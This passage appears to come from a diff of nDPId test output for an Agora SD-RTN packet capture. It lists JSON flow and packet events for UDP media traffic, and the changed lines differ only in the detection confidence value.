-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1649098069706,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069706,"pkt":"eJS0JASgYDjgxTWgCABFoAEGnXlAAD8RBxbAqAJkF\/i6s7ldH8IA8lBqANlPMQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXhQpGxSUTlZVVzRgedZI3rLw+yxzMMdRjhd4IxCkFFQUQEAEFFU0dQVUJTQQAEzTSboCt7FM6A6woBSDA6BXje0FytH\/VlmqM5WAGn1G0SDjb8WsY2P509Oy+4jMINQREZeQEsu3l+MyWzK1mwlUtFWFMEAFAyNTZDQ1JUKADZFgkMuGiQFv+XwY\/lEZgfEpSWft+heUioR7HtGh8+YnBtBMYIuCeZ"} 
00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1649098069706,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069706,"pkt":"eJS0JASgYDjgxTWgCABFoAEGnXpAAD8RBxXAqAJkF\/i6s7ldH8IA8lBqANlPMQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXhQpGxSUTlZVVzRgedZI3rLw+yxzMMdRjhd4IxCkFFQUQEAEFFU0dQVUJTQQAEzTSboCt7FM6A6woBSDA6BXje0FytH\/VlmqM5WAGn1G0SDjb8WsY2P509Oy+4jMINQREZeQEsu3l+MyWzK1mwlUtFWFMEAFAyNTZDQ1JUKADZFgkMuGiQFv+XwY\/lEZgfEpSWft+heUioR7HtGh8+YnBtBMYIuCeZ"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098070259,"flow_last_seen":1649098070259,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098070259,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1649098070259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098070259,"pkt":"eJS0JASgYDjgxTWgCABFoAEGcMpAAD8R\/H7AqAJkaKahS53JH8IA8s+NAEgoZgAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXixWqIu8Gcf4dKl8YbY6ScLHaeEVhZsgcXNXy8JkFFQUQEAEFFU0dQVUJTQQAEW9tpqQFA11\/RBrZKZfvLqZo+b7pqhtn0DCWx+rfbK0RhV3SjA4EIMBkWWjSgD3I+lMSTJETgvPJiu1gt5j6GSEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098070259,"flow_last_seen":1649098070259,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098070259,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098070259,"flow_last_seen":1649098070259,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098070259,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1649098070260,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098070260,"pkt":"eJS0JASgYDjgxTWgCABFoAEGcMtAAD8R\/H3AqAJkaKahS53JH8IA8s+NAEgoZgAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXixWqIu8Gcf4dKl8YbY6ScLHaeEVhZsgcXNXy8JkFFQUQEAEFFU0dQVUJTQQAEW9tpqQFA11\/RBrZKZfvLqZo+b7pqhtn0DCWx+rfbK0RhV3SjA4EIMBkWWjSgD3I+lMSTJETgvPJiu1gt5j6GSEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1649098070260,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098070260,"pkt":"eJS0JASgYDjgxTWgCABFoAEGcMxAAD8R\/HzAqAJkaKahS53JH8IA8s+NAEgoZgAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXixWqIu8Gcf4dKl8YbY6ScLHaeEVhZsgcXNXy8JkFFQUQEAEFFU0dQVUJTQQAEW9tpqQFA11\/RBrZKZfvLqZo+b7pqhtn0DCWx+rfbK0RhV3SjA4EIMBkWWjSgD3I+lMSTJETgvPJiu1gt5j6GSEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093575787,"flow_last_seen":1649093575878,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":2971,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093570648,"flow_last_seen":1649093570772,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":4016,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093710805,"flow_last_seen":1649093710879,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3070,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093640794,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3143,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093580792,"flow_last_seen":1649093580849,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3272,"flow_avg_l4_payload_len":218,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":6422,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093575787,"flow_last_seen":1649093575878,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":2971,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093570648,"flow_last_seen":1649093570772,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":4016,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093710805,"flow_last_seen":1649093710879,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3070,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093640794,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3143,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093580792,"flow_last_seen":1649093580849,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3272,"flow_avg_l4_payload_len":218,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":6422,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098089567,"flow_last_seen":1649098089567,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098089567,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1649098089567,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098089567,"pkt":"eJS0JASgYDjgxTWgCABFoAEGfpRAAD8R7rTAqAJkaKahS9gaH8IA8rfKAGAtlAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKX2UCEar3dNMPGtldPVRNmQ34X8ajeoM6TdWbZjDkFFQUQEAEFFU0dQVUJTQQAE6Cg10bM\/s1\/AQlysPUPvJxLM50KHpzktiZkWalUHk9iQoPekmRbdl\/zw\/WgmvM4RvbCndAgYzXUOxjChVG3pIktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098089567,"flow_last_seen":1649098089567,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098089567,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098089567,"flow_last_seen":1649098089567,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098089567,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1649098089567,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098089567,"pkt":"eJS0JASgYDjgxTWgCABFoAEGfpVAAD8R7rPAqAJkaKahS9gaH8IA8rfKAGAtlAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKX2UCEar3dNMPGtldPVRNmQ34X8ajeoM6TdWbZjDkFFQUQEAEFFU0dQVUJTQQAE6Cg10bM\/s1\/AQlysPUPvJxLM50KHpzktiZkWalUHk9iQoPekmRbdl\/zw\/WgmvM4RvbCndAgYzXUOxjChVG3pIktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1649098089567,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098089567,"pkt":"eJS0JASgYDjgxTWgCABFoAEGfpZAAD8R7rLAqAJkaKahS9gaH8IA8rfKAGAtlAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKX2UCEar3dNMPGtldPVRNmQ34X8ajeoM6TdWbZjDkFFQUQEAEFFU0dQVUJTQQAE6Cg10bM\/s1\/AQlysPUPvJxLM50KHpzktiZkWalUHk9iQoPekmRbdl\/zw\/WgmvM4RvbCndAgYzXUOxjChVG3pIktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098094676,"flow_last_seen":1649098094676,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098094676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1649098094676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098094676,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnadAAD8Rb7jAqAJkgAHp2tgaH8IA8ZNOAIvfcAAAIQAAAAAABFNOSQAbADEyOC0xLTIzMy0yMTguZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAApfs6FeucFt3UJmlHV\/+qfWl4ZO66hJe2FMaw985tQUVBRAQAQUVTR1BVQlNBAASl7alnNwBac\/EM8\/e3OTwxYjqU4L8L+DfMIlwLYBmF2RVcj8IsWMZ8xtI3LcXYd4rg7aVow0QpJr1ImfC\/7ik+S0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098094676,"flow_last_seen":1649098094676,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098094676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098094676,"flow_last_seen":1649098094676,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098094676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1649098094676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098094676,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnahAAD8Rb7fAqAJkgAHp2tgaH8IA8ZNOAIvfcAAAIQAAAAAABFNOSQAbADEyOC0xLTIzMy0yMTguZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAApfs6FeucFt3UJmlHV\/+qfWl4ZO66hJe2FMaw985tQUVBRAQAQUVTR1BVQlNBAASl7alnNwBac\/EM8\/e3OTwxYjqU4L8L+DfMIlwLYBmF2RVcj8IsWMZ8xtI3LcXYd4rg7aVow0QpJr1ImfC\/7ik+S0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1649098094676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098094676,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnalAAD8Rb7bAqAJkgAHp2tgaH8IA8ZNOAIvfcAAAIQAAAAAABFNOSQAbADEyOC0xLTIzMy0yMTguZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAApfs6FeucFt3UJmlHV\/+qfWl4ZO66hJe2FMaw985tQUVBRAQAQUVTR1BVQlNBAASl7alnNwBac\/EM8\/e3OTwxYjqU4L8L+DfMIlwLYBmF2RVcj8IsWMZ8xtI3LcXYd4rg7aVow0QpJr1ImfC\/7ik+S0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098129676,"flow_last_seen":1649098129676,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098129676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
